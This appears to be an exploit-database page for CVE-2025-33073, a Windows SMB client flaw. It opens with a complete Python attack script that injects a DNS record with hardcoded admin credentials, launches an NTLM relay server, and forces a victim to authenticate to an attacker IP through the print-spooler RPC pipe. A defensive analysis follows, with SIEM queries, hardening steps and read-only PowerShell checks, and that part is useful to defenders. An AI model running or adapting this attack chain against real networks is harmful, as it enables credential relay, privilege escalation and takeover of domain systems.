Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

Exploit Author: Mohammed Idrees Banyamer Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2025-06-15 
#!/usr/bin/env python3
# Exploit Title:  Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.

import argparse
import subprocess
import socket
import time
import sys

def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
    print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
    cmd = [
        "samba-tool", "dns", "add", dns_ip, dc_fqdn,
        record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] DNS record successfully added.")
    except subprocess.CalledProcessError:
        print("[!] Failed to add DNS record. Check credentials and connectivity.")
        sys.exit(1)

def check_record(record_name):
    print("[*] Verifying DNS record propagation...")
    for i in range(10):
        try:
            result = socket.gethostbyname_ex(record_name)
            if result and result[2]:
                print(f"[+] DNS record resolved to: {result[2]}")
                return True
        except socket.gaierror:
            time.sleep(2)
    print("[!] DNS record did not propagate or resolve.")
    return False

def start_ntlmrelay(target):
    print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
    try:
        subprocess.Popen([
            "impacket-ntlmrelayx", "-t", target, "--no-smb-server"
        ])
        print("[*] NTLM relay server started.")
    except Exception as e:
        print(f"[!] Failed to start NTLM relay server: {e}")
        sys.exit(1)

def trigger_coercion(victim_ip, fake_host):
    print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
    cmd = [
        "rpcping",
        "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
        "-s", fake_host,
        "-e", "1234",
        "-a", "n",
        "-u", "none",
        "-p", "none"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] Coercion RPC call sent successfully.")
    except subprocess.CalledProcessError:
        print("[!] RPC coercion failed. Verify victim connectivity and service status.")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
    parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
    parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
    parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
    parser.add_argument("--target", required=True, help="Target system to relay authentication to")
    parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
    args = parser.parse_args()

    record = "relaytrigger"
    fqdn = f"{record}.{args.dc_fqdn}"

    inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
    if not check_record(fqdn):
        print("[!] DNS verification failed, aborting.")
        sys.exit(1)

    start_ntlmrelay(args.target)
    time.sleep(5)  # Wait for relay server to be ready

    trigger_coercion(args.victim_ip, fqdn)

    print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")

if __name__ == "__main__":
    main()


Windows 11 SMB Client — CVE-2025-33073: High-level Analysis, Detection, and Mitigation

This article provides a defensive, high-level examination of the Windows SMB client vulnerability tracked as CVE-2025-33073 (public disclosure June 2025). It explains the impact and attack surface in non-actionable terms, and gives practical guidance for defenders: how to detect suspicious activity, harden environments, validate remediation, and prioritize mitigations.

Summary and Risk Profile

CVE-2025-33073 affects SMB client implementations in multiple Microsoft Windows releases (including Windows 11, Windows 10 variants, and Windows Server releases). At a high level, the vulnerability results from an incorrect access-control/interaction between name resolution, SMB authentication, and RPC coercion paths — enabling an attacker to coerce an authenticated domain user or endpoint to authenticate to an attacker-controlled service, and then abuse those credentials via NTLM relay-style techniques to escalate privileges or perform remote code execution in some scenarios.

  • Attack vector: Remote, requires an authenticated domain user (user interaction/context).
  • Typical chain: DNS or name-resolution manipulation + coerced authentication to an attacker-controlled endpoint + relay/abuse of the authentication material.
  • Impact: Privilege escalation, unauthorized access, and potential remote code execution in environments lacking mitigations.
  • Remediation level: Patch available from Microsoft. Configuration hardening strongly recommended.

Affected Versions (Representative)

Product FamilyRepresentative Versions
Windows 1122H2, 22H3, 23H2, 24H2
Windows 101507 through 22H2 (various builds)
Windows Server2016, 2019, 2022 (including 23H2)

How the Attack Works — High-Level (Non-Actionable)

At a conceptual level, an attack leveraging this class of vulnerability typically combines:

  • Manipulation of name resolution or DNS records to make clients resolve attacker-controlled hosts.
  • Coercion techniques that induce the victim endpoint to initiate authentication to the attacker-controlled host (often by invoking services that perform network authentication implicitly).
  • Abuse of NTLM or negotiated authentication material using relay techniques to authenticate to higher-privileged targets on behalf of the victim.

Note: This description deliberately omits step-by-step procedures or tooling references — defenders should avoid replicating exploit chains outside of properly authorized lab tests.

Detection & Monitoring Guidance

Detecting exploitation attempts requires correlating authentication events, SMB/RPC access patterns, and DNS or name-resolution anomalies. Key disciplines include endpoint/host logging, domain controller logs, DNS server auditing, and network traffic inspection.

  • Events to monitor on endpoints and DCs:
    • Security events for authentication: 4624 (successful logon), 4625 (failed logon), 4648 (explicit credential use), 4776 (NTLM validation), and 4672/4673 (privileged operations).
    • SMB audit logs and application/service-specific errors referencing authentication failures or anomalous sessions.
  • DNS and name-resolution telemetry: unusual dynamic updates, unexpected A/AAAA records, or DNS updates originating from non-authoritative sources.
  • Network indicators: unexpected outbound SMB (port 445) or named-pipe/RPC traffic from workstations to external IPs or to internal hosts that typically do not receive client authentication.

Example SIEM/Search Queries (Defensive)


# Splunk-style example (generic)
index=wineventlog EventCode=4624 Authentication_Package=NTLM
| stats count by src_ip, Account_Name, Workstation_Name, Logon_Type
| where count > 5

This example groups successful NTLM authentications by source IP and account and highlights higher-than-normal counts that may indicate relay or coerced authentication activity.


# Elasticsearch/Kibana-style (pseudocode)
event.code:4624 AND process.name:svchost.exe AND authentication_package:NTLM
| group by src.ip, user.name
| filter by anomalous_target_hosts

Customize thresholds and anomaly detection based on baseline behavior per environment.

Immediate Mitigations & Hardening (Priority Checklist)

  • Apply vendor patches immediately: Install Microsoft updates that patch CVE-2025-33073 across affected OS versions. Test and roll out through standard patch management.
  • Enforce SMB signing and SMB encryption: Enable and require SMB signing and, where feasible, SMB encryption for both client and server roles via Group Policy or configuration baselines.
  • Enable Extended Protection for Authentication (EPA): Use EPA where supported to bind authentication to the intended service endpoint and reduce coercion risk.
  • Limit or block NTLM: Move away from NTLM where possible; progressively restrict NTLM usage via Group Policy (restricting NTLM authentication and auditing before enforcement).
  • Network controls: Block outbound SMB (TCP 445) from end-user subnets to untrusted networks; restrict SMB within network zones using segmentation and firewall policies.
  • DNS hygiene: Restrict dynamic DNS updates to authorized hosts, monitor for unusual updates, and harden DNS server access permissions.
  • Least privilege and privileged access workstations: Ensure high-value accounts do not log on to general-purpose workstations; use dedicated hardened jump hosts or PAWs for administration.
  • Multi-factor Authentication: Require MFA for remote and privileged access to reduce abuse potential of relayed credentials.

Validating Mitigations — Safe, Non-Exploit Tests

After applying patches and configuration changes, validate using non-exploit checks and telemetry:

  • Verify SMB signing/encryption via administrative PowerShell (see examples below).
  • Confirm NTLM restrictions and audit events are being generated (test on controlled accounts and machines only).
  • Run network scans that verify port and firewall restrictions (e.g., ensure endpoint-to-external SMB is blocked).

Defensive PowerShell Examples


# Query local SMB client and server configuration
Get-SmbClientConfiguration | Select RequireSecuritySignature, EnableSecuritySignature
Get-SmbServerConfiguration | Select RequireSecuritySignature, EnableSecuritySignature, EncryptData

Explanation: These PowerShell cmdlets query SMB client and server settings on a host. RequireSecuritySignature and EnableSecuritySignature indicate whether SMB signing is required or enabled; EncryptData shows whether SMB encryption is configured on the server side. Use these checks for policy compliance verification across endpoints and servers.


# Check LSA NTLM level (read-only, safe)
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name LmCompatibilityLevel -ErrorAction SilentlyContinue

Explanation: LmCompatibilityLevel is a registry setting that influences NTLM/LM behavior. Querying it is a safe read-only operation that helps you inventory client/server authentication posture prior to making policy changes.

Operational Recommendations for SOCs and IT Teams

  • Prioritize patching for domain controllers and client endpoints at risk, and verify patch deployment with configuration management tools.
  • Perform focused hunts for anomalous NTLM authentication flows and DNS updates in the days following disclosure.
  • Communicate with application owners to identify legacy systems that depend on NTLM and plan migration strategies.
  • Use a test/lab environment to validate mitigations before wide deployment; avoid reproducing the exploit chain in production or without authorization.

Vendor Guidance & Patch Notes

Follow Microsoft's official security advisory and cumulative updates for specific KBs and guidance. Vendor advisories will include exact KB numbers, affected builds, and deployment recommendations; use those as the authoritative source for patching and rollback procedures.

Conclusion

CVE-2025-33073 highlights the ongoing risk from combined weaknesses across name resolution, authentication protocols, and legacy authentication mechanisms. Defenders should treat this incident as a reminder to accelerate migration away from NTLM, enforce SMB signing and EPA, apply vendor patches promptly, and increase visibility across DNS and authentication telemetry. Where uncertainty exists, coordinate remediation work through standard change management and testing processes and involve incident response or red-team resources only under authorized conditions.